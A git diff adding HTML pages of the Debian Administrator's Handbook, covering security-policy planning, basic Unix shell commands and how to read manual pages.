+                      href="sect.other-security-considerations.html#sect.physical-security">14.6.6. Physical Security</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.other-security-considerations.html#id-1.17.9.9">14.6.7. Legal Liability</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.dealing-with-compromised-machine.html">14.7. Dealing with a Compromised Machine</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.dealing-with-compromised-machine.html#id-1.17.10.3">14.7.1. Detecting and Seeing the Cracker's Intrusion</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.dealing-with-compromised-machine.html#id-1.17.10.4">14.7.2. Putting the Server Off-Line</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.dealing-with-compromised-machine.html#sect.keeping-everything-that-could-be-used-as-evidence">14.7.3. Keeping Everything that Could Be Used as Evidence</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.dealing-with-compromised-machine.html#id-1.17.10.6">14.7.4. Re-installing</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.dealing-with-compromised-machine.html#sect.forensic-analysis">14.7.5. Forensic Analysis</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.dealing-with-compromised-machine.html#sect.reconstituting-the-attack-scenario">14.7.6. Reconstituting the Attack Scenario</a></span></dt></dl></dd></dl></div><div
+          class="highlights"><div
+            class="para">
+		An information system can have a varying level of importance depending on the environment. In some cases, it is vital to a company's survival. It must therefore be protected from various kinds of risks. The process of evaluating these risks, defining and implementing the protection is collectively known as the “security process”.
+	</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.defining-security-policy"></a>14.1. Defining a Security Policy</h2></div></div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> Scope of this chapter</strong></p></div></div></div><div
+              class="para">
+			Security is a vast and very sensitive subject, so we cannot claim to describe it in any kind of comprehensive manner in the course of a single chapter. We will only delineate a few important points and describe some of the tools and methods that can be of use in the security domain. For further reading, literature abounds, and entire books have been devoted to the subject. An excellent starting point would be <em
+                class="citetitle">Linux Server Security</em> by Michael D. Bauer (published by O'Reilly).
+		</div></div><div
+            class="para">
+			The word “security” itself covers a vast range of concepts, tools and procedures, none of which apply universally. Choosing among them requires a precise idea of what your goals are. Securing a system starts with answering a few questions. Rushing headlong into implementing an arbitrary set of tools runs the risk of focusing on the wrong aspects of security.
+		</div><div
+            class="para">
+			The very first thing to determine is therefore the goal. A good approach to help with that determination starts with the following questions:
+		</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+					<span
+                    class="emphasis"><em>What</em></span> are we trying to protect? The security policy will be different depending on whether we want to protect computers or data. In the latter case, we also need to know which data.
+				</div></li><li
+                class="listitem"><div
+                  class="para">
+					What are we trying to protect <span
+                    class="emphasis"><em>against</em></span>? Is it leakage of confidential data? Accidental data loss? Revenue loss caused by disruption of service?
+				</div></li><li
+                class="listitem"><div
+                  class="para">
+					Also, <span
+                    class="emphasis"><em>who</em></span> are we trying to protect against? Security measures will be quite different for guarding against a typo by a regular user of the system than they would be when protecting against a determined attacker group.
+				</div></li></ul></div><div
+            class="para">
+			The term “risk” is customarily used to refer collectively to these three factors: what to protect, what needs to be prevented from happening, and who will try to make it happen. Modeling the risk requires answers to these three questions. From this risk model, a security policy can be constructed, and the policy can be implemented with concrete actions.
+		</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> Permanent questioning</strong></p></div></div></div><div
+              class="para">
+			Bruce Schneier, a world expert in security matters (not only computer security) tries to counter one of security's most important myths with a motto: “Security is a process, not a product”. Assets to be protected change in time, and so do threats and the means available to potential attackers. Even if a security policy has initially been perfectly designed and implemented, one should never rest on one's laurels. The risk components evolve, and the response to that risk must evolve accordingly.
+		</div></div><div
+            class="para">
+			Extra constraints are also worth taking into account, as they can restrict the range of available policies. How far are we willing to go to secure a system? This question has a major impact on the policy to implement. The answer is too often only defined in terms of monetary costs, but the other elements should also be considered, such as the amount of inconvenience imposed on system users or performance degradation.
+		</div><div
+            class="para">
+			Once the risk has been modeled, one can start thinking about designing an actual security policy.
+		</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> Extreme policies</strong></p></div></div></div><div
+              class="para">
+			There are cases where the choice of actions required to secure a system is extremely simple.
+		</div><div
+              class="para">
+			For instance, if the system to be protected only comprises a second-hand computer, the sole use of which is to add a few numbers at the end of the day, deciding not to do anything special to protect it would be quite reasonable. The intrinsic value of the system is low. The value of the data is zero since they are not stored on the computer. A potential attacker infiltrating this “system” would only gain an unwieldy calculator. The cost of securing such a system would probably be greater than the cost of a breach.
+		</div><div
+              class="para">
+			At the other end of the spectrum, we might want to protect the confidentiality of secret data in the most comprehensive way possible, trumping any other consideration. In this case, an appropriate response would be the total destruction of these data (securely erasing the files, shredding of the hard disks to bits, then dissolving these bits in acid, and so on). If there is an additional requirement that data must be kept in store for future use (although not necessarily readily available), and if cost still isn't a factor, then a starting point would be storing the data on iridium–platinum alloy plates stored in bomb-proof bunkers under various mountains in the world, each of which being (of course) both entirely secret and guarded by entire armies…
+		</div><div
+              class="para">
+			Extreme though these examples may seem, they would nevertheless be an adequate response to defined risks, insofar as they are the outcome of a thought process that takes into account the goals to reach and the constraints to fulfill. When coming from a reasoned decision, no security policy is less respectable than any other.
+		</div></div><div
+            class="para">
+			In most cases, the information system can be segmented in consistent and mostly independent subsets. Each subsystem will have its own requirements and constraints, and so the risk assessment and the design of the security policy should be undertaken separately for each. A good principle to keep in mind is that a short and well-defined perimeter is easier to defend than a long and winding frontier. The network organization should also be designed accordingly: the sensitive services should be concentrated on a small number of machines, and these machines should only be accessible via a minimal number of check-points; securing these check-points will be easier than securing all the sensitive machines against the entirety of the outside world. It is at this point that the usefulness of network filtering (including by firewalls) becomes apparent. This filtering can be implemented with dedicated hardware, but a possibly simpler and more flexible solution is to use a software firewall such as the one integrated in the Linux kernel.
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.rtc-clients.html"><strong>Předcházející</strong>13.10. Real-Time Communications software</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.firewall-packet-filtering.html"><strong>Další</strong>14.2. Firewall or Packet Filtering</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/short-remedial-course.html b/publish/cs-CZ/Debian/9/html/debian-handbook/short-remedial-course.html
new file mode 100644
index 000000000..e1f1b8b5a
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/short-remedial-course.html
@@ -0,0 +1,323 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Příloha B. Short Remedial Course</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="BIOS, Kernel, Unix, Process, Hierarchy, Basic Commands" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.other-derivatives.html"
+        title="A.13. And Many More" /><link
+        rel="next"
+        href="sect.filesystem-hierarchy.html"
+        title="B.2. Organization of the Filesystem Hierarchy" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/short-remedial-course.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.other-derivatives.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.filesystem-hierarchy.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="appendix"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="short-remedial-course"></a>Příloha B. Short Remedial Course</h1></div></div></div><div
+          class="highlights"><div
+            class="para">
+		Even though this book primarily targets administrators and “power-users”, we wouldn't like to exclude motivated beginners. This appendix will therefore be a crash-course describing the fundamental concepts involved in handling a Unix computer.
+	</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.shell-and-basic-commands"></a>B.1. Shell and Basic Commands</h2></div></div></div><div
+            class="para">
+			In the Unix world, every administrator has to use the command line sooner or later; for example, when the system fails to start properly and only provides a command-line rescue mode. Being able to handle such an interface, therefore, is a basic survival skill for these circumstances.
+		</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>QUICK LOOK</em></span> Starting the command interpreter</strong></p></div></div></div><div
+              class="para">
+			A command-line environment can be run from the graphical desktop, by an application known as a “terminal”. In GNOME, you can start it from the “Activities” overview (that you get when you move the mouse in the top-left corner of the screen) by typing the first letters of the application name. In Plasma, you will find it in the <span
+                class="guimenu"><strong>K</strong></span> → <span
+                class="guisubmenu"><strong>Applications</strong></span> → <span
+                class="guisubmenu"><strong>System</strong></span> menu.
+		</div></div><div
+            class="para">
+			This section only gives a quick peek at the commands. They all have many options not described here, so please refer to the abundant documentation in their respective manual pages.
+		</div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.21.4.5"></a>B.1.1. Browsing the Directory Tree and Managing Files</h3></div></div></div><div
+              class="para">
+				Once a session is open, the <code
+                class="command">pwd</code> command (which stands for <span
+                class="emphasis"><em>print working directory</em></span>) displays the current location in the filesystem. The current directory is changed with the <code
+                class="command">cd <em
+                  class="replaceable">directory</em></code> command (<code
+                class="command">cd</code> is for <span
+                class="emphasis"><em>change directory</em></span>). The parent directory is always called <code
+                class="literal">..</code> (two dots), whereas the current directory is also known as <code
+                class="literal">.</code> (one dot). The <code
+                class="command">ls</code> command allows <span
+                class="emphasis"><em>listing</em></span> the contents of a directory. If no parameters are given, it operates on the current directory.
+			</div><pre
+              class="screen">
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>pwd</code></strong>
+<code
+                class="computeroutput">/home/rhertzog
+$ </code><strong
+                class="userinput"><code>cd Desktop</code></strong>
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>pwd</code></strong>
+<code
+                class="computeroutput">/home/rhertzog/Desktop
+$ </code><strong
+                class="userinput"><code>cd .</code></strong>
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>pwd</code></strong>
+<code
+                class="computeroutput">/home/rhertzog/Desktop
+$ </code><strong
+                class="userinput"><code>cd ..</code></strong>
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>pwd</code></strong>
+<code
+                class="computeroutput">/home/rhertzog
+$ </code><strong
+                class="userinput"><code>ls</code></strong>
+<code
+                class="computeroutput">Desktop    Downloads  Pictures  Templates
+Documents  Music      Public    Videos</code>
+</pre><div
+              class="para">
+				A new directory can be created with <code
+                class="command">mkdir <em
+                  class="replaceable">directory</em></code>, and an existing (empty) directory can be removed with <code
+                class="command">rmdir <em
+                  class="replaceable">directory</em></code>. The <code
+                class="command">mv</code> command allows <span
+                class="emphasis"><em>moving</em></span> and/or renaming files and directories; <span
+                class="emphasis"><em>removing</em></span> a file is achieved with <code
+                class="command">rm <em
+                  class="replaceable">file</em></code>.
+			</div><pre
+              class="screen">
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>mkdir test</code></strong>
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>ls</code></strong>
+<code
+                class="computeroutput">Desktop    Downloads  Pictures  Templates  Videos
+Documents  Music      Public    test
+$ </code><strong
+                class="userinput"><code>mv test new</code></strong>
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>ls</code></strong>
+<code
+                class="computeroutput">Desktop    Downloads  new       Public     Videos
+Documents  Music      Pictures  Templates
+$ </code><strong
+                class="userinput"><code>rmdir new</code></strong>
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>ls</code></strong>
+<code
+                class="computeroutput">Desktop    Downloads  Pictures  Templates  Videos
+Documents  Music      Public</code>
+</pre></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.21.4.6"></a>B.1.2. Displaying and Modifying Text Files</h3></div></div></div><div
+              class="para">
+				The <code
+                class="command">cat <em
+                  class="replaceable">file</em></code> command (intended to <span
+                class="emphasis"><em>concatenate</em></span> files to the standard output device) reads a file and displays its contents on the terminal. If the file is too big to fit on a screen, use a pager such as <code
+                class="command">less</code> (or <code
+                class="command">more</code>) to display it page by page.
+			</div><div
+              class="para">
+				The <code
+                class="command">editor</code> command starts a text editor (such as <code
+                class="command">vi</code> or <code
+                class="command">nano</code>) and allows creating, modifying and reading text files. The simplest files can sometimes be created directly from the command interpreter thanks to redirection: <code
+                class="command">echo "<em
+                  class="replaceable">text</em>" &gt;<em
+                  class="replaceable">file</em></code> creates a file named <em
+                class="replaceable">file</em> with “<em
+                class="replaceable">text</em>” as its contents. Adding a line at the end of this file is possible too, with a command such as <code
+                class="command">echo "<em
+                  class="replaceable">moretext</em>" &gt;&gt;<em
+                  class="replaceable">file</em></code>. Note the <code
+                class="literal">&gt;&gt;</code> in this example.
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.21.4.7"></a>B.1.3. Searching for Files and within Files</h3></div></div></div><div
+              class="para">
+				The <code
+                class="command">find <em
+                  class="replaceable">directory</em> <em
+                  class="replaceable">criteria</em></code> command looks for files in the hierarchy under <em
+                class="replaceable">directory</em> according to several criteria. The most commonly used criterion is <code
+                class="literal">-name <em
+                  class="replaceable">name</em></code>: that allows looking for a file by its name.
+			</div><div
+              class="para">
+				The <code
+                class="command">grep <em
+                  class="replaceable">expression</em> <em
+                  class="replaceable">files</em></code> command searches the contents of the files and extracts the lines matching the regular expression (see sidebar <a
+                class="xref"
+                href="network-services.html#sidebar.regexp"><span
+                  class="emphasis"><em>BACK TO BASICS</em></span> Regular expression</a>). Adding the <code
+                class="literal">-r</code> option enables a recursive search on all files contained in the directory passed as a parameter. This allows looking for a file when only a part of the contents are known.
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.21.4.8"></a>B.1.4. Managing Processes</h3></div></div></div><div
+              class="para">
+				The <code
+                class="command">ps aux</code> command lists the processes currently running and helps identifying them by showing their <span
+                class="emphasis"><em>pid</em></span> (process id). Once the <span
+                class="emphasis"><em>pid</em></span> of a process is known, the <code
+                class="command">kill -<em
+                  class="replaceable">signal</em> <em
+                  class="replaceable">pid</em></code> command allows sending it a signal (if the process belongs to the current user). Several signals exist; most commonly used are <code
+                class="literal">TERM</code> (a request to terminate gracefully) and <code
+                class="literal">KILL</code> (a forced kill).
+			</div><div
+              class="para">
+				The command interpreter can also run programs in the background if the command is followed by a “&amp;”. By using the ampersand, the user resumes control of the shell immediately even though the command is still running (hidden from the user; as a background process). The <code
+                class="command">jobs</code> command lists the processes running in the background; running <code
+                class="command">fg %<em
+                  class="replaceable">job-number</em></code> (for <span
+                class="emphasis"><em>foreground</em></span>) restores a job to the foreground. When a command is running in the foreground (either because it was started normally, or brought back to the foreground with <code
+                class="command">fg</code>), the <span
+                class="keycap"><strong>Control</strong></span>+<span
+                class="keycap"><strong>Z</strong></span> key combination pauses the process and resumes control of the command-line. The process can then be restarted in the background with <code
+                class="command">bg %<em
+                  class="replaceable">job-number</em></code> (for <span
+                class="foreignphrase"><em
+                  class="foreignphrase">background</em></span>).
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.21.4.9"></a>B.1.5. System Information: Memory, Disk Space, Identity</h3></div></div></div><div
+              class="para">
+				The <code
+                class="command">free</code> command displays information on memory; <code
+                class="command">df</code> (<span
+                class="emphasis"><em>disk free</em></span>) reports on the available disk space on each of the disks mounted in the filesystem. Its <code
+                class="literal">-h</code> option (for <span
+                class="emphasis"><em>human readable</em></span>) converts the sizes into a more legible unit (usually mebibytes or gibibytes). In a similar fashion, the <code
+                class="command">free</code> command supports the <code
+                class="literal">-m</code> and <code
+                class="literal">-g</code> options, and displays its data either in mebibytes or in gibibytes, respectively.
+			</div><pre
+              class="screen">
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>free</code></strong>
+<code
+                class="computeroutput">             total       used       free     shared    buffers     cached
+Mem:       1028420    1009624      18796          0      47404     391804
+-/+ buffers/cache:     570416     458004
+Swap:      2771172     404588    2366584
+$ </code><strong
+                class="userinput"><code>df</code></strong>
+<code
+                class="computeroutput">Filesystem           1K-blocks      Used Available Use% Mounted on
+/dev/sda2              9614084   4737916   4387796  52% /
+tmpfs                   514208         0    514208   0% /lib/init/rw
+udev                     10240       100     10140   1% /dev
+tmpfs                   514208    269136    245072  53% /dev/shm
+/dev/sda5             44552904  36315896   7784380  83% /home
+</code></pre><div
+              class="para">
+				The <code
+                class="command">id</code> command displays the identity of the user running the session, along with the list of groups they belong to. Since access to some files or devices may be limited to group members, checking available group membership may be useful.
+			</div><pre
+              class="screen">
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>id</code></strong>
+<code
+                class="computeroutput">uid=1000(rhertzog) gid=1000(rhertzog) groups=1000(rhertzog),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),109(bluetooth),115(scanner)</code>
+</pre></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.other-derivatives.html"><strong>Předcházející</strong>A.13. And Many More</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.filesystem-hierarchy.html"><strong>Další</strong>B.2. Organization of the Filesystem Hierarchy</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/solving-problems.html b/publish/cs-CZ/Debian/9/html/debian-handbook/solving-problems.html
new file mode 100644
index 000000000..25bb23be4
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/solving-problems.html
@@ -0,0 +1,474 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 7. Solving Problems and Finding Relevant Information</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Documentation, Solving problems, Log files, README.Debian, Manual, info" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.searching-packages.html"
+        title="6.9. Searching for Packages" /><link
+        rel="next"
+        href="sect.common-procedures.html"
+        title="7.2. Common Procedures" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/solving-problems.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.searching-packages.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.common-procedures.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="solving-problems"></a>Kapitola 7. Solving Problems and Finding Relevant Information</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="solving-problems.html#sect.documentation-sources">7.1. Documentation Sources</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="solving-problems.html#sect.manual-pages">7.1.1. Manual Pages</a></span></dt><dt><span
+                    class="section"><a
+                      href="solving-problems.html#id-1.10.4.5">7.1.2. <span
+                        class="emphasis"><em>info</em></span> Documents</a></span></dt><dt><span
+                    class="section"><a
+                      href="solving-problems.html#id-1.10.4.6">7.1.3. Specific Documentation</a></span></dt><dt><span
+                    class="section"><a
+                      href="solving-problems.html#id-1.10.4.7">7.1.4. Websites</a></span></dt><dt><span
+                    class="section"><a
+                      href="solving-problems.html#id-1.10.4.8">7.1.5. Tutorials (<span
+                        class="emphasis"><em>HOWTO</em></span>)</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.common-procedures.html">7.2. Common Procedures</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.common-procedures.html#id-1.10.5.5">7.2.1. Configuring a Program</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.common-procedures.html#id-1.10.5.6">7.2.2. Monitoring What Daemons Are Doing</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.common-procedures.html#id-1.10.5.7">7.2.3. Asking for Help on a Mailing List</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.common-procedures.html#id-1.10.5.8">7.2.4. Reporting a Bug When a Problem Is Too Difficult</a></span></dt></dl></dd></dl></div><div
+          class="highlights"><div
+            class="para">
+		For an administrator, the most important skill is to be able to cope with any situation, known or unknown. This chapter gives a number of methods that will — hopefully — allow you to isolate the cause of any problem that you will encounter, so that you may be able to resolve them.
+	</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.documentation-sources"></a>7.1. Documentation Sources</h2></div></div></div><a
+            id="id-1.10.4.2"
+            class="indexterm"></a><div
+            class="para">
+			Before you can understand what is really going on when there is a problem, you need to know the theoretical role played by each program involved in the problem. To do this, the best reflex to have is consult their documentation; but since these documentations are many and can be scattered far and wide, you should know all the places where they can be found.
+		</div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.manual-pages"></a>7.1.1. Manual Pages</h3></div></div></div><a
+              id="id-1.10.4.4.2"
+              class="indexterm"></a><a
+              id="id-1.10.4.4.3"
+              class="indexterm"></a><a
+              id="id-1.10.4.4.4"
+              class="indexterm"></a><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>CULTURE</em></span> <acronym
+                          class="acronym">RTFM</acronym></strong></p></div></div></div><a
+                id="id-1.10.4.4.5.2"
+                class="indexterm"></a><div
+                class="para">
+				This acronym stands for “Read the F***ing Manual”, but can also be expanded in a friendlier variant, “Read the Fine Manual”. This phrase is sometimes used in (terse) responses to questions from newbies. It is rather abrupt, and betrays a certain annoyance at a question asked by someone who has not even bothered to read the documentation. Some say that this classic response is better than no response at all (since it indicates that the documentation contains the information sought), or than a more verbose and angry answer.
+			</div><div
+                class="para">
+				In any case, if someone responds “RTFM” to you, it is often wise not to take offense. Since this answer may be perceived as vexing, you might want to try and avoid receiving it. If the information that you need is not in the manual, which can happen, you might want to say so, preferably in your initial question. You should also describe the various steps that you have personally taken to find information before you raised a question on a forum. Following Eric Raymond's guidelines is a good way to avoid the most common mistakes and get useful answers. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="http://catb.org/~esr/faqs/smart-questions.html">http://catb.org/~esr/faqs/smart-questions.html</a></div>
+			</div></div><div
+              class="para">
+				Manual pages, while relatively terse in style, contain a great deal of essential information. We will quickly go over the command for viewing them. Simply type <code
+                class="command">man <em
+                  class="replaceable">manual-page</em></code> — the manual page usually goes by the same name as the command whose documentation is sought. For example, to learn about the possible options for the <code
+                class="command">cp</code> command, you would type the <code
+                class="command">man cp</code> command at the shell prompt (see sidebar <a
+                class="xref"
+                href="solving-problems.html#sidebar.shell"><span
+                  class="emphasis"><em>BACK TO BASICS</em></span> The shell, a command line interpreter</a>).
+			</div><div
+              class="sidebar"><a
+                xmlns=""
+                id="sidebar.shell"></a><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>BACK TO BASICS</em></span> The shell, a command line interpreter</strong></p></div></div></div><a
+                id="id-1.10.4.4.7.2"
+                class="indexterm"></a><a
+                id="id-1.10.4.4.7.3"
+                class="indexterm"></a><div
+                class="para">
+				A command line interpreter, also called a “shell”, is a program that executes commands that are either entered by the user or stored in a script. In interactive mode, it displays a prompt (usually ending in <code
+                  class="literal">$</code> for a normal user, or by <code
+                  class="literal">#</code> for an administrator) indicating that it is ready to read a new command. <a
+                  class="xref"
+                  href="short-remedial-course.html">B – „<em>Short Remedial Course</em>“</a> describes the basics of using the shell.
+			</div><div
+                class="para">
+				The default and most commonly used shell is <code
+                  class="command">bash</code> (Bourne Again SHell), but there are others, including <code
+                  class="command">dash</code>, <code
+                  class="command">csh</code>, <code
+                  class="command">tcsh</code> and <code
+                  class="command">zsh</code>.
+			</div><div
+                class="para">
+				Among other things, most shells offer help during input at the prompt, such as the completion of command or file names (which you can generally activate by pressing the <span
+                  class="keycap"><strong>tab</strong></span> key), or recalling previous commands (history management).
+			</div></div><div
+              class="para">
+				Man pages not only document programs accessible from the command line, but also configuration files, system calls, C library functions, and so forth. Sometimes names can collide. For example, the shell's <code
+                class="command">read</code> command has the same name as the <code
+                class="function">read</code> system call. This is why manual pages are organized in numbered sections:
+			</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="orderedlist"><ol><li
+                  class="listitem"><div
+                    class="para">
+						commands that can be executed from the command line;
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						system calls (functions provided by the kernel);
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						library functions (provided by system libraries);
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						devices (on Unix-like systems, these are special files, usually placed in the <code
+                      class="filename">/dev/</code> directory);
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						configuration files (formats and conventions);
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						games;
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						sets of macros and standards;
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						system administration commands;
+					</div></li><li
+                  class="listitem"><div
+                    class="para">
+						kernel routines.
+					</div></li></ol></div><div
+              class="para">
+				It is possible to specify the section of the manual page that you are looking for: to view the documentation for the <code
+                class="function">read</code> system call, you would type <code
+                class="command">man 2 read</code>. When no section is explicitly specified, the first section that has a manual page with the requested name will be shown. Thus, <code
+                class="command">man shadow</code> returns <span
+                class="citerefentry"><span
+                  class="refentrytitle">shadow</span>(5)</span> because there are no manual pages for <span
+                class="foreignphrase"><em
+                  class="foreignphrase">shadow</em></span> in sections 1 to 4.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>TIP</em></span> <code
+                          class="command">whatis</code></strong></p></div></div></div><a
+                id="id-1.10.4.4.11.2"
+                class="indexterm"></a><div
+                class="para">
+				If you do not want to look at the full manual page, but only a short description to confirm that it is what you are looking for, simply enter <code
+                  class="command">whatis <em
+                    class="replaceable">command</em></code>.
+			</div><pre
+                class="screen">
+<code
+                  class="computeroutput">$ </code><strong
+                  class="userinput"><code>whatis scp</code></strong>
+<code
